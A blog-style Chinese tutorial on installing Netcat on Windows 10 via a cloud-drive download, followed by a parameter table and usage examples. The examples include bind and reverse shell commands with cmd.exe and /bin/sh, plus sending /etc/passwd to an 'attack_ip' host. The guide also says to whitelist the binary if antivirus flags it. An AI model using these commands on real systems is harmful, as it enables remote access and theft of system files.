Windows 10 安装和使用Netcat
Windows 10 安装和使用Netcat
简介:
Netcat简称nc,netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据,通过与其它工具结合和重定向,你可以在脚本中以多种方式使用它,使用netcat命令能够完成很多实验。
1.nc下载
网盘链接:https://pan.baidu.com/s/1BHfHtup3OlVxxSovhT1-xQ
提取码:nc12
2.解压到自定义文件夹
解压后的文件如图
3.按照使用指导将nc.exe文件复制到C:\Windows\System32文件中
这里杀毒软件可能会报错,把文件添加到信任区即可。
4.检测是否成功
win+r cmd打开两个命令行
分别输入指令:nc -l -p 7777 (对7777端口开启监听)
之后在下方输入 如果另外一个命令行能监听到即为成功。
nc localhost 7777 (对之前开启的监听进行检验)
这里可以成功进行监听。
参数 | 说明 |
---|---|
-d | 后台执行 |
-e prog | 程序重定向,一旦连接,就执行 |
-g gateway | 源路由跳数,最大值为8(source-routing hop point[s],up to 8) |
-G num | 源路由指针:4,8,12,… (source-routing pointer: 4,8,12,…) |
-h | 查看帮助信息 |
-i secs | 延时的间隔 |
-l | 监听模式,用于入站连接 |
-n | 指定数字的IP地址,不能用hostname |
-o file | 记录16进制的传输 |
-p port | 本地端口号 |
-r | 任意指定本地及远程端口 |
-s addr | 本地源地址 |
-u | UDP模式(netcat-1.15可以:远程nc -ulp port -e cmd.exe,本地nc -u ip port连接,得到一个shell. ) |
-w secs | 指定超时的时间 |
-z | 将输入输出关掉——用于扫描时 |
-v | 详细输出——用两个-v可得到更详细的内容 |
基本用法
① 端口扫描:
nc -vv ip port
例:nc -vv 192.168.1.1 5000 扫描192.168.1.1的tcp 5000端口
nc -vv -w secs ip port-port
例:nc -vv -w 5 192.168.1.1 5000-5002
扫描192.168.1.1的5000-6000端口,网络超时的时间设为5秒
注意超时时间的单位是秒不是毫秒,另外nc这个用法的扫描效率远不及nmap
②正向连接
被攻击主机的需要是完整版的nc,有些版本的nc没有-e这个参数。
nc -l -p port -e cmd.exe #被攻击主机如果是windows
nc -l -p port -e /bin/sh #被攻击主机是linux
攻击者连接方式很简单:
nc ip port
③反向连接
攻击主机先开始监听端口:
nc -lvvp port
被攻击主机连接攻击者监听的端口:
nc -e cmd.exe ip port #被攻击主机如果是windows
nc -e /bin/sh ip port #被攻击主机是linux
④传送文件
攻击主机先开始监听:
nc -d -l -p port > tmp
被攻击主机再开始传送文件:
nc attack_ip port < /etc/passwd
⑤下载文件
攻击主机先开始监听:
nc -d -l -p port < tmp
被攻击主机再开始下载文件:
nc attack_ip port > tmp
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· .NET10 - 预览版1新功能体验(一)
2020-01-03 在Eclipse中安装和使用TFS插件。使用TFS作为代码版本管理工具